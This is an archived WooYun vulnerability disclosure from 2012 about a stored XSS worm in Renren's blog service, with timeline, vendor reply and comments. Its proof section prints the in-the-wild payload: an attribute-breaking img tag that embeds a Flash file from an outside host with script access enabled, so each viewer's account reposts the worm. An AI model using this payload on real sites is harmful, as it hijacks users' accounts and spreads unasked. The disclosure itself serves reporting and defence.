当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015136

漏洞标题:人人网正大规模XSS攻击

相关厂商:人人网

漏洞作者: 路人甲

提交时间:2012-11-23 01:39

修复时间:2013-01-07 01:39

公开时间:2013-01-07 01:39

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-23: 细节已通知厂商并且等待厂商处理中
2012-11-23: 厂商已经确认,细节仅向厂商公开
2012-12-03: 细节向核心白帽子及相关领域专家公开
2012-12-13: 细节向普通白帽子公开
2012-12-23: 细节向实习白帽子公开
2013-01-07: 细节向公众公开

简要描述:

人人网日志发布服务出现XSS漏洞,由于漏洞已经泄露,目前正在被大规模攻击。

详细说明:

original_eyyN_312c000026da118f.jpg


I Love You , My Sweetheart
以上就是表象的日志内容。目前只要浏览过这篇日志,在IE8下就会被XSS跨站,自动发布一篇同样携带跨站脚本的日志。

漏洞证明:

<img title="audio-media" class="audio" src=http://www.xxxx.com/uploadfile/2012/0923/20120923103719840.gif" border="0" alt="mp3;http://itsokla.duapp.com/Xss.swf&quot;></object><embed src=&quot;http://itsokla.duapp.com/Xss.swf&quot;type=&quot;application/x-shockwave-flash&quot;allowscriptaccess=&quot;always&quot;><i a=&quot;#.mp3" />

修复方案:

加入过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-11-23 02:26

厂商回复:

细节不是很详细,但是无法公开,所以给分数比较低,见谅

最新状态:

暂无


漏洞评价:

评论

  1. 2012-11-23 08:53 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    蠕虫。。。昨晚发现了。。

  2. 2013-01-07 09:43 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    哈哈,这个原帖貌似蠕虫没控制好,只给了1rank。。。